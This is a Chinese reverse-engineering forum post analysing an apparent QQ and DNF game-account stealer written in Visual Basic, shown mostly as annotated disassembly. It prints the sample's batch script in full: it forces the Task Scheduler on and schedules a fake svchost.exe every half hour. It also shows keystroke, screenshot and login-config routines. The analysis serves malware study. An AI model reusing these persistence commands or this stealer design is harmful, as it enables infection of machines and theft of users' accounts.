好友
阅读权限40
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 是昔流芳 于 2011-2-11 12:19 编辑
本篇幅比较长就不自我介绍了。。。大体分2部分,预知详情,请看下文!7339EDA9 . 50 push eax ; /pVersionInformation
7339EDAA . 33FF xor edi,edi ; |
7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
7339EDBC . 33C0 xor eax,eax
......
7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service Pack
7339EE2A . 50 push eax
00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
004068B4 52 push edx
004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
004068E7 50 push eax
004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068F3 8BD0 mov edx,eax
004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
00406BAB 50 push eax
00406BAC 68 3C334000 push 脱壳后.0040333C
00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
00406BB7 8BF0 mov esi,eax
00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BBC F7DE neg esi
00406BBE 1BF6 sbb esi,esi
00406BC0 46 inc esi
00406BC1 F7DE neg esi
00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr
733BD096 . 51 push ecx ; /pLocalFileTime
733BD097 . 50 push eax ; |pFileTime
733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
733BD09E . 85C0 test eax,eax
733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
733BD0AE . 52 push edx ; /pSystemTime
733BD0AF . 50 push eax ; |pFileTime
733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime
0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
00410062 33FF xor edi,edi
00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00410067 897D EC mov dword ptr ss:[ebp-14],edi
0041006A 897D DC mov dword ptr ss:[ebp-24],edi
0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator")
00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
00410086 50 push eax
00410087 6A 01 push 1
00410089 6A FF push -1
0041008B 68 20010000 push 120
00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
00410092 57 push edi
00410093 6A 01 push 1
00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
004100A1 50 push eax
004100A2 6A 01 push 1
004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
004100A7 6A 11 push 11
004100A9 51 push ecx
004100AA 6A 01 push 1
004100AC 68 80000000 push 80
004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
004100B3 83C4 1C add esp,1C
004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
004100B9 6A 01 push 1
004100BB 52 push edx
004100BC 68 244A4000 push 脱壳后.00404A24
004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
004100CD 6A 01 push 1
004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
004100D4 50 push eax
004100D5 6A 02 push 2
004100D7 6A FF push -1
004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)
00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
00407288 6A FF push -1
0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
0040729D 51 push ecx
0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少
004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
004072A9 8BD0 mov edx,eax
004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
004072B4 50 push eax
004072B5 6A 01 push 1
004072B7 6A FF push -1
004072B9 6A 02 push 2
004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
{
sc config Schedule start= AUTO
net start schedule
AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
}
=====================================================================(美丽的分割线哇!哇卡卡!!)
00402F43 00 db 00
00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
00402F49 . 0BC0 or eax,eax
00402F4B . 74 02 je short svchost.00402F4F
00402F4D . FFE0 jmp eax
00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00402F59 . FFD0 call eax
00402F5B . FFE0 jmp eax ; user32.FindWindowA
00402F5D 00 db 00
00402F5E 00 db 00
00403034 nbsp; A1 20574100 mov eax,dword ptr ds:[415720]
00403039 . 0BC0 or eax,eax
0040303B . 74 02 je short svchost.0040303F
0040303D . FFE0 jmp eax
0040303F > 68 1C304000 push svchost.0040301C ; user32
00403044 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403049 . FFD0 call eax
0040304B . FFE0 jmp eax ; SendMessageA
0040307C nbsp; A1 2C574100 mov eax,dword ptr ds:[41572C]
00403081 . 0BC0 or eax,eax
00403083 . 74 02 je short svchost.00403087
00403085 . FFE0 jmp eax
00403087 > 68 64304000 push svchost.00403064 ;
0040308C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403091 . FFD0 call eax
00403093 . FFE0 jmp eax ; RtlMoveMemory
00403114 nbsp; A1 44574100 mov eax,dword ptr ds:[415744]
00403119 . 0BC0 or eax,eax
0040311B . 74 02 je short svchost.0040311F
0040311D . FFE0 jmp eax
0040311F > 68 FC304000 push svchost.004030FC ;
00403124 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403129 . FFD0 call eax
0040312B . FFE0 jmp eax ; GetForegroundWindow
0040315C nbsp; A1 50574100 mov eax,dword ptr ds:[415750]
00403161 . 0BC0 or eax,eax
00403163 . 74 02 je short svchost.00403167
00403165 . FFE0 jmp eax
00403167 > 68 44314000 push svchost.00403144 ; user32
0040316C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403171 . FFD0 call eax
00403173 . FFE0 jmp eax ; GetWindowTextA
0040501F > \68 FC4F4000 push svchost.00404FFC ; GetClassNameA
00405024 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00405029 . FFD0 call eax
0040502B . FFE0 jmp eax ; GetClassNameA
0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
004034A1 . 0BC0 or eax,eax
004034A3 . 74 02 je short svchost.004034A7
004034A5 . FFE0 jmp eax
004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
004034B1 . FFD0 call eax
004034B3 . FFE0 jmp eax
0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
00403451 . 0BC0 or eax,eax
00403453 . 74 02 je short svchost.00403457
00403455 . FFE0 jmp eax
00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403461 . FFD0 call eax
00403463 . FFE0 jmp eax
00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
0040354D . FFD0 call eax
0040354F .- FFE0 jmp eax ; user32.SetWindowLongA
00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
00402EA9 . 0BC0 or eax,eax
00402EAB . 74 02 je short svchost.00402EAF
00402EAD . FFE0 jmp eax
00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId
00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
00402EB9 . FFD0 call eax
00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId
00411639 . 6A 03 push 3 ; /varType = Long
0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
0041163E . 33FF xor edi,edi ; |
00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
00411645 . 50 push eax ; |ArrayVar
00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
0041165E . 51 push ecx
0041165F . 57 push edi
00411660 . 68 10040000 push 410
00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
{
004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
004031A5 . 0BC0 or eax,eax
004031A7 . 74 02 je short svchost.004031AB
004031A9 . FFE0 jmp eax
004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
004031B5 . FFD0 call eax
004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
}
0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>
004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
004116B1 . 50 push eax
004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
004116B8 . 8BD0 mov edx,eax
004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
004116CF . 68 F4010000 push 1F4
004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
004116D7 . 51 push ecx
004116D8 . 52 push edx
004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi
00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
00404B2D . 0BC0 or eax,eax
00404B2F . 74 02 je short svchost.00404B33
00404B31 . FFE0 jmp eax
00404B7F > \68 5C4B4000 push svchost.00404B5C ; EnumProcessModules
00404B84 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00404B89 . FFD0 call eax
00404B8B . FFE0 jmp eax ; EnumProcessModules
004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy
00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
00403235 . 0BC0 or eax,eax
00403237 . 74 02 je short svchost.0040323B
00403239 . FFE0 jmp eax
0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403245 . FFD0 call eax
00403247 . FFE0 jmp eax
0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C2C2 . 6A 00 push 0
0040C2C4 . 6A FF push -1
0040C2C6 . 6A 01 push 1
0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
0040C2D5 . 50 push eax ; /String8
0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C328 . 6A 00 push 0
0040C32A . 6A FF push -1
0040C32C . 6A 01 push 1
0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
0040C33B . 52 push edx ; /String8
0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
0040C33F . 50 push eax ; |ARG2
0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]
00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
00404C79 . FFD0 call eax
00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot
00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404CDD . FFD0 call eax
00404CDF . FFE0 jmp eax ; Process32First
00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404D25 . FFD0 call eax
00404D27 .- FFE0 jmp eax ; kernel32.Process32Next
0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
0040C6A1 . 0F84 62240000 je svchost.0040EB09 这个是判断是否有DNF.exe
0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4
004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403505 . FFD0 call eax
00403507 . FFE0 jmp eax
733A03F6 BB B8A63A73 mov ebx,msvbvm60.733AA6B8 ; ThunderRT6Main
733A03FB 50 push eax
733A03FC 53 push ebx
733A03FD FF35 D0064A73 push dword ptr ds:[734A06D0] ; msvbvm60.73390000
733A0403 FF15 F8123973 call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
733A0409 33F6 xor esi,esi
733A040B 85C0 test eax,eax
733A040D 75 71 jnz short msvbvm60.733A0480
733A040F 6A 0C push 0C
733A0411 8D7D CC lea edi,dword ptr ss:[ebp-34]
733A0414 59 pop ecx
733A0415 6A 01 push 1
733A0417 FF35 D4064A73 push dword ptr ds:[734A06D4] ; svchost.00400000
733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
733A1313 . 68 55133A73 push msvbvm60.733A1355
733A1318 . 57 push edi
733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B
004035D0 nbsp; A1 D4574100 mov eax,dword ptr ds:[4157D4]
004035D5 . 0BC0 or eax,eax
004035D7 . 74 02 je short svchost.004035DB
004035D9 . FFE0 jmp eax
004035DB > 68 B8354000 push svchost.004035B8 ; user32
004035E0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004035E5 . FFD0 call eax
004035E7 . FFE0 jmp eax ; GetWindowTextLengthW
0040364D . 0BC0 or eax,eax
0040364F . 74 02 je short svchost.00403653
00403651 . FFE0 jmp eax
00403653 > 68 30364000 push svchost.00403630 ; user32
00403658 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
0040365D . FFD0 call eax
0040365F . FFE0 jmp eax ; GetKeyState
00403690 nbsp; A1 EC574100 mov eax,dword ptr ds:[4157EC]
00403695 . 0BC0 or eax,eax
00403697 . 74 02 je short svchost.0040369B
00403699 . FFE0 jmp eax
0040369B > 68 78364000 push svchost.00403678 ; user32
004036A0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004036A5 . FFD0 call eax
004036A7 . FFE0 jmp eax ; MapVirtualKeyA
7340CEF2 |. 56 push esi ; /lParam
7340CEF3 |. FF75 0C push [arg.2] ; |wParam
7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx
004033B0 nbsp; A1 80574100 mov eax,dword ptr ds:[415780]
004033B5 . 0BC0 or eax,eax
004033B7 . 74 02 je short svchost.004033BB
004033B9 . FFE0 jmp eax
004033BB > 68 98334000 push svchost.00403398 ; user32
004033C0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004033C5 . FFD0 call eax
004033C7 . FFE0 jmp eax ; GetDC
733A1BAF . 57 push edi ; /hDC => NULL
733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
733A1BB6 . 3BC7 cmp eax,edi
733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
733A1BC6 . 50 push eax ; |hDC
733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject
004059AB > \68 88594000 push svchost.00405988 ; GDIPlus
004059B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004059B5 . FFD0 call eax
004059B7 . FFE0 jmp eax ; GdipSaveImageToFile
0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
0040D52F . 6A 00 push 0
0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
0040D534 . 52 push edx
00411B52 . 68 305C4000 push svchost.00405C30 ; Write
00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
00411B5D . 53 push ebx
00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
00411B69 . 51 push ecx
00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
00411B70 . 52 push edx
00411B71 . FFD7 call edi
00411B73 . 83C4 10 add esp,10
00411B76 . 50 push eax
00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
00411B7D . 50 push eax
00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
00411B84 . 83C4 1C add esp,1C
00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
